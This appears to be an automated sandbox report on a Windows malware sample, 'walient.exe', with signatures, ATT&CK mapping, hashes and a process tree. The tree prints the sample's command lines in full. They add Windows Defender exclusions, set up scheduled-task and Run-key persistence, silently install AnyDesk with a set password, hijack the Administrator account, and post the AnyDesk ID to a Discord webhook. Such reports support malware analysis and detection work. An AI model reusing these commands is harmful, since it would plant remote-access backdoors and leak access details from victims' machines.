Analysis
max time kernel: 123s
max time network: 122s
platform: windows11-21h2_x64
resource: win11-20240611-en
resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 04-07-2024 20:40
Static task: static1
Behavioral task: behavioral1
Sample: walient.exe
Resource: win11-20240611-en
General
Target: walient.exe
Size: 121KB
MD5: 5c76d15a7d3f57f26edc494bd9db318b
SHA1: cfa089d8d7e9fde67b6cb85827d33431b2d80066
SHA256: af872e954905dbfeb165da42d722889a7dfc4b84e88b52c9abc9de18a1a9d74f
SHA512: 3d7a621dcb56a8d8ded08e49c34c77071bcb8e8f408acd2ec9c00ff887342d1e3be935f3ad56b33ef7a96d0d85e1e36b6cccc9498a2b0fe96dab7b5d5747c1fb
SSDEEP: 3072:0ojAQkj90n5EIrHshi+LFUWHnGWdw8OkG2Li0HbovOm:YjWnSeGisFXnJw8Ziib
Malware Config
Extracted: https://download.anydesk.com/AnyDesk.exe
Signatures
Grants admin privileges 1 TTPs
  Uses net.exe to modify the user's privileges.
Blocklisted process makes network request 2 IoCs
  Processes: powershell.exe, powershell.exe
  flow | pid | process
  4 | 3100 | powershell.exe
  41 | 4564 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe
  pid | process
  1008 | powershell.exe
  976 | powershell.exe
  4744 | powershell.exe
  1436 | powershell.exe
  4564 | powershell.exe
  3100 | powershell.exe
  3624 | powershell.exe
Drops startup file 2 IoCs
  Processes: walient.exe
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk | walient.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.lnk | walient.exe
Executes dropped EXE 10 IoCs
  Processes: System32.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, AnyDesk.exe, System32.exe
  pid | process
  1640 | System32.exe
  3948 | AnyDesk.exe
  3376 | AnyDesk.exe
  1912 | AnyDesk.exe
  3384 | AnyDesk.exe
  4920 | AnyDesk.exe
  1332 | AnyDesk.exe
  832 | AnyDesk.exe
  1092 | AnyDesk.exe
  2656 | System32.exe
Adds Run key to start application 2 TTPs 2 IoCs
  Processes: walient.exe, reg.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\System32.exe" | walient.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AnyDesk = "\"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --silent" | reg.exe
Checks installed software on the system 1 TTPs
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Drops file in System32 directory 15 IoCs
Drops file in Program Files directory 2 IoCs
  Processes: AnyDesk.exe
  description | ioc | process
  File created | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | AnyDesk.exe
  File opened for modification | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | AnyDesk.exe
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
Enumerates physical storage devices 1 TTPs
  Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe 4 IoCs
  Processes: timeout.exe, timeout.exe, timeout.exe, timeout.exe
  pid | process
  2840 | timeout.exe
  3372 | timeout.exe
  1772 | timeout.exe
  2372 | timeout.exe
Modifies registry class 16 IoCs
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes: schtasks.exe, schtasks.exe
  pid | process
  3288 | schtasks.exe
  4116 | schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
  Processes: AnyDesk.exe
  pid | process
  4920 | AnyDesk.exe
Suspicious behavior: EnumeratesProcesses 49 IoCs
Suspicious use of AdjustPrivilegeToken 17 IoCs
Suspicious use of FindShellTrayWindow 11 IoCs
Suspicious use of SendNotifyMessage 11 IoCs
Suspicious use of SetWindowsHookEx 3 IoCs
  Processes: walient.exe, AnyDesk.exe
  pid | process
  960 | walient.exe
  1092 | AnyDesk.exe
  1092 | AnyDesk.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Users\Admin\AppData\Local\Temp\walient.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\walient.exe"
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\walient.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'walient.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\System32.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System32.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\schtasks.exe
    Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System32" /tr "C:\Users\Admin\System32.exe"
    - Scheduled Task/Job: Scheduled Task
  C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c C:\ProgramData\System32.bat
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://download.anydesk.com/AnyDesk.exe', 'C:\AnyDesk.exe')"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\timeout.exe
      Command line: timeout /t 5 /nobreak
      - Delays execution with timeout.exe
    C:\AnyDesk.exe
      Command line: "C:\AnyDesk.exe" --install "C:\Program Files (x86)\AnyDesk" --silent --update-auto
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      C:\AnyDesk.exe
        Command line: "C:\AnyDesk.exe" --local-service
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
      C:\AnyDesk.exe
        Command line: "C:\AnyDesk.exe" --local-control
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
    C:\Windows\system32\timeout.exe
      Command line: timeout /t 7 /nobreak
      - Delays execution with timeout.exe
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo Itsm3g#no "
    C:\Program Files (x86)\AnyDesk\AnyDesk.exe
      Command line: "C:\Program Files (x86)\AnyDesk/AnyDesk.exe" --set-password
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\system32\timeout.exe
      Command line: timeout /t 3 /nobreak
      - Delays execution with timeout.exe
    C:\Windows\system32\reg.exe
      Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AnyDesk" /t REG_SZ /d "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\" --silent" /f
      - Adds Run key to start application
    C:\Windows\system32\timeout.exe
      Command line: timeout /t 2 /nobreak
      - Delays execution with timeout.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers' -Name 'C:\Program Files (x86)\AnyDesk\AnyDesk.exe' -Value 'RUNASADMIN'"
      - Command and Scripting Interpreter: PowerShell
      - Access Token Manipulation: Create Process with Token
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\net.exe
      Command line: net localgroup Administrators Admin /delete
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators Admin /delete
    C:\Windows\system32\net.exe
      Command line: net localgroup Administrators /delete
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators /delete
    C:\Windows\system32\net.exe
      Command line: net localgroup Administrators Administrator /add
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators Administrator /add
    C:\Windows\system32\net.exe
      Command line: net user Administrator Itsm3g#no
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user Administrator Itsm3g#no
    C:\Windows\system32\net.exe
      Command line: net user Administrator /active:yes
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 user Administrator /active:yes
    C:\Windows\system32\schtasks.exe
      Command line: schtasks /create /tn "Booter" /tr "\"C:\Program Files (x86)\AnyDesk\AnyDesk.exe\"" /sc onstart /ru system /rl highest
      - Scheduled Task/Job: Scheduled Task
    C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c cmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id
      C:\Windows\system32\cmd.exe
        Command line: cmd /c ""C:\Program Files (x86)\AnyDesk\AnyDesk.exe"" --get-id
        C:\Program Files (x86)\AnyDesk\AnyDesk.exe
          Command line: "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --get-id
          - Executes dropped EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -Command "$body = @{ content = 'AnyDesk ID is: \"1363826712\"' }; Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1258511169841532991/GrwPZfm9ekTr7GHjmdDSwad-g2UoAbt-DvGuyTG8kPXJ9PK0sGzxcyCmHj39cK_JV3sc' -Method Post -ContentType 'application/json' -Body ($body | ConvertTo-Json)"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\System32.exe
  Command line: C:\Users\Admin\System32.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
  Command line: "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  C:\Program Files (x86)\AnyDesk\AnyDesk.exe
    Command line: "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --backend
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
  Command line: "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
  - Executes dropped EXE
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
C:\Windows\system32\AUDIODG.EXE
  Command line: C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004DC
  - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\System32.exe
  Command line: C:\Users\Admin\System32.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
  Command and Scripting Interpreter (1)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Account Manipulation (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Access Token Manipulation (1)
    Create Process with Token (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Downloads
-
C:\AnyDesk.exeFilesize
5.1MB
MD5aee6801792d67607f228be8cec8291f9
SHA1bf6ba727ff14ca2fddf619f292d56db9d9088066
SHA2561cdafbe519f60aaadb4a92e266fff709129f86f0c9ee595c45499c66092e0499
SHA51209d9fc8702ab6fa4fc9323c37bc970b8a7dd180293b0dbf337de726476b0b9515a4f383fa294ba084eccf0698d1e3cb5a39d0ff9ea3ba40c8a56acafce3add4f
-
C:\ProgramData\AnyDesk\service.confFilesize
2KB
MD5e0f56b88aacb294d6be47f7bcb51c555
SHA198ebaf991f66ae9f94a50caafd339828492042ab
SHA256064e3179c548a409a9fb0ba220585d4bcd516a47d908f3d1e8f40b8377d05e02
SHA51213e026642c61f7599854f2fd453eae01a37158d45dc0676ed5df7f2e15629c879efcd64aab6a52d58a44b226b8cb64bf1804b823a0d9d93d63266d190509c1d4
-
C:\ProgramData\AnyDesk\service.confFilesize
3KB
MD50cfcdc7661a3f3de7bb713e731b6bff0
SHA13a763fa6ed368c24729db9478880196f6e106786
SHA25619632eae1746330970b64ff8cc879bff75ff82934c29911ea56ea923ea9d1e60
SHA512b94f5dc43a6a9320ffafd0dc8918086d1eb738f2f73e66cff80d26950cc8c81250b00582ea3846d89f38bf82b98dc3cc005d99dee4afd55bd7b6611fbdcacc80
-
C:\ProgramData\AnyDesk\system.confFilesize
370B
MD5afdc4f69f4720b8c4153f6186f49a2b6
SHA1329c27ea36d7913809b0c239bb58e91d2ee468ac
SHA2569a218849d74b0ca75ef719b0cab59b40529b958097eb0b0b8527b09bc293a571
SHA5123a8a6e1994a681a12875b820eb7ca78b6c035a1489c4d8648590424dbec3152e6831ac0c4a73560968231c9b45db869dad189109fb1ecb4a3159258e0099a7de
-
C:\ProgramData\AnyDesk\system.confFilesize
482B
MD5f4e4265aba4f725aa5f6b108a6f8c1e5
SHA1e24a6ebde2a690e97491c02f513c3245592f2eac
SHA256eefc386a9572e1ddea0d7476e8b3b2d70fc08f0c71467eb24ddb71cadf0906ef
SHA512854cb14a678112c7dce785b0353dff8f11680194138e1e2a319cc8da880c9484b0d64fcbe5c41016d33f5e9eccff89f9563ec21fa7b274406b2359341d266970
-
C:\ProgramData\AnyDesk\system.confFilesize
690B
MD5620262eb2949dc87256a53b76f9db2f2
SHA12035cedea5d86a7b5c020abc8763aed9fd1b0d49
SHA256d052164be8748395b746583220e6e65a13548243a5436feb0d74f843f32083d1
SHA512f19e9f808834a6a7111fb7b2c0785b3050d931dc706fa1f314bcb213d7cab938514fee4032dad3a8f28bda65209daf4505025e77ba0d91feb3d82bcd87276cbc
-
C:\ProgramData\AnyDesk\system.confFilesize
747B
MD5e7738117c5524f22fa99cd7f2a5ad382
SHA114f50aec8cbcaa70e70479f1cf3897d90e24b0d1
SHA2566d8e70d9aa419d6e014340d47e0d9abf45d02febe3d957af939875a5ba92b5f6
SHA5124a3326296462271744128cc3b7bca1b9734da8566dabed2d01757da71a97af4efd9677bed88f74917d64501177c5811af335ce0ad3363360eccb04e25c31d766
-
C:\ProgramData\AnyDesk\system.confFilesize
956B
MD56319ce0b5326caf23489e5adddcee4a0
SHA1d7769680610321abaf0c763351c6c9d34127a664
SHA2564096756b9b370649a03c4b9fa1efbc6f8728ba38ca314b12badf34fa1a01f181
SHA512870be307398d3cbc8209fdbfa32be138d83bb2b54e056948c0085b6fc3a7d016a81b501e92be9ce8a9ec262aa0a428995a130751d28061d92a632955a9c86901
-
C:\ProgramData\System32.batFilesize
1KB
MD573e1f5a29694c5899071a654e501e174
SHA1bef7e160242c776d04bc4e6766fd22a848e10142
SHA25653ed7e7fa874e9965210b8c600ab9c0f331c7f1d514bb2cfe13375edcf0a8f74
SHA512e16dc641315d7f04b05844432438b19f5f00aaefde5da54f24f37e9b158df90fa54e0a5b9ea749c5e239528f6d55e3bd22374ffd91acb2a2e03b0fd784fa71ff
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System32.exe.logFilesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD51bb532b5a4c3719a8f8905bcdd4b46dd
SHA15b8172fb3038f4e0dbd81995d48bc446ec70e26d
SHA2567b77cd3f6634833b49bb35b7564e8193e1d5b00e0467a431797d4ee15d38e795
SHA51227393736905758e7140bf664bb256ff8e9bb209bcabf984030a4dc8697cb6bc4388b67c3fbf579c7e2ac57513122a4cbd30cba4928762450d081f8664c019c52
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD540528f21e62ac55b45b89c31cef94b34
SHA16d6f5d19397f9fbeb71c661261066268b8a0111b
SHA256f312cec5d5a9e227285d82a09e4002c827b58b18b7aa4c9477485cc4ce479dbc
SHA512679b8be2049b9e3642295f9b39f66544ecd02d03160d86cf40b8290e4723187a9f108e71bd005d6eaeebe724d251e4828b152f33df870687d30d23b6877fd33a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD521017c68eaf9461301de459f4f07e888
SHA141ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA25603b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5d8f32fd3fbbbb87ea88ed7b823adc7eb
SHA17992e16e92f146bddc925b6c0decbcc23b6f17bd
SHA256655e240fcfd9da5958966e13cb5dbaa2541baf937bb08fc0799899ff8f5d47dc
SHA5121722912ff5f39260bd835ac7d9203dc0306218ddd1b6026ecd839aceb772bdd8e1a961e740a95cd4aa776ff4ade4585067f48240a858c4460e343320b07e9364
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5051a74485331f9d9f5014e58ec71566c
SHA14ed0256a84f2e95609a0b4d5c249bca624db8fe4
SHA2563f67e4ba795fd89d33e9a1fe7547e297a82ae50b8f25eedc2b33a27866b28888
SHA5121f15fd8ca727b198495ef826002c1cbcc63e98eecb2e92abff48354ae668e6c3aaf9bd3005664967ae75637bacee7e730ce36142483d08ae6a068d9ae3e0e17d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gtdh25u4.hfk.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
28KB
MD52602eb05dd419b7f8a1fcac13c5d6ac2
SHA1156853e5c482fbdae973858429797aa993ee7220
SHA256818bf9e627b6f7e79efb1600166a4abcc0752338f540b580e57cd0c46c5a78a2
SHA51257cb235276eddc22a9dd22d5050f0938602d8bbc5e7f2af7d55f489d3ffc3a42779c8698fc1a55e3b981805183e79db3c1fc46b686f266043473fa82b6f6ba84
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
32KB
MD5524d62d99f1439139774e013417fedeb
SHA13843cafa4ed8c7f883048ff4436c6923107ccdb0
SHA25635f893aa1c933d61f09502cd2f6cf449cc3d54a45a53cab7f21c1741720d74b5
SHA5120ba350e9cdde8033050e894c058b2733c4a47dfa8259e5e0abb5e190818fd85e2b655408f016232f1170a253e7eece10dc77de06d3d8ace41da4fc4149e7b0d3
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
38KB
MD5845213cee4ad06db3363e2893ace3d88
SHA16583940eb951e070bfd51927ace369b08dfcc4c4
SHA2562c3809eaeec78bfa7f364882b1d1013ba16baa75c3e955dfe36daaa370a0233a
SHA51213109adc897a2d905b3cccc5144348c8fb256cefa97afdc2320519eeee6a86d46680d218433c7a2d29c3818c0cdd3e499e550f4d9dac97e09355d5fa0ee4e3ca
-
C:\Users\Admin\AppData\Roaming\AnyDesk\ad.traceFilesize
8KB
MD5fdd4b4ef5baabfd2d6ad6efb6165802a
SHA1ccab8b13616f82e11b8796bf675bc7450ba071dc
SHA2568de59f3fd660ec549fc727cacc4028051706b9ba8fc7a2e867eaf0711e98a440
SHA512f06702ee3ff985e90b5f7a90b19f170960b8cf9e0e9f8b14eeb26ae9a7d665012da24ca2202389cb980719297eb3513e23573d3e090adcfffbc690c0c65b9c96
-
C:\Users\Admin\AppData\Roaming\AnyDesk\service.confFilesize
2KB
MD5a1febfd0d7250ff544e9571a2455797c
SHA18e48d6c88aa4b86f57c52f27f3a3f31ec8168a2d
SHA256922235df26ba159df9337f9126a83566c3426459759b2e9a36038d4708c9fd5b
SHA512e20dfc595e21256b6600f414e9bfa0a79efa030b04b8169a3bc3b342727b6c726fb499acb8cc42bf9777faa6a47aae2044f88764c8039913e825586be603adc3
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
424B
MD58d320d56839fd5b0cc0d4743f69e5c7a
SHA1d21c6c350072d63270b06a780108b80d06500830
SHA2567f24ff661cb9fd8efc824684daff043bf2eeebafe36a066eb4c8ff8c25faac07
SHA5120b4f557c92fe43e1e61c7afae557054892ef08c7fa0bf6cb252dcb7b0bdc805008351d8bbf0cec55a7492ef37c9e4796501ff772d9e405541f1dc4c03a0f0ffd
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
632B
MD553431d0c8ae79ed5d32e619cd10ce1a6
SHA1a25536ebc439995f5f35521322451f480ad54d72
SHA256f8ec6b7120e75a5897c82fa849ad89fa2e48763e7e06aed77b6e8136d021dd59
SHA51240edc010367548878d20189c0d630ff986c9e953fbb8fc75845303b3aec263f9f94d372ff708590fe180f2a8a7340734aa2d5f37f7d8277e1abb2212d56f34d1
-
C:\Users\Admin\AppData\Roaming\AnyDesk\system.confFilesize
312B
MD50c04ad1083dc5c7c45e3ee2cd344ae38
SHA1f1cf190f8ca93000e56d49732e9e827e2554c46f
SHA2566452273c017db7cbe0ffc5b109bbf3f8d3282fb91bfa3c5eabc4fb8f1fc98cb0
SHA5126c414b39bbc1f1f08446c6c6da6f6e1ceb9303bbf183ae279c872d91641ea8d67ec5e5c4e0824da3837eca73ec29fe70e92b72c09458c8ce50fa6f08791d1492
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
1KB
MD5a1908800919718602641b8db4ea29f9b
SHA1172d04fb65d1cc12b24187b435ad79cd028c1972
SHA25648b737441db0bff16f8f6dcf4e60b690268d022af8c77d246d84dd740fef039b
SHA5127c6f3b7bd80e7a61f996c996a3500f96c180115d8ab41393c081fc8253f1c93e5263a449ec500d34aa06d5e6e8d99b0f9b61019d6cea596868a1195b4c7de7f4
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.confFilesize
5KB
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
5KB
-
C:\Users\Admin\AppData\Roaming\AnyDesk\user.conf
Filesize
41B
-
C:\Users\Admin\System32.exe
Filesize
121KB
-
\??\PIPE\wkssvc
-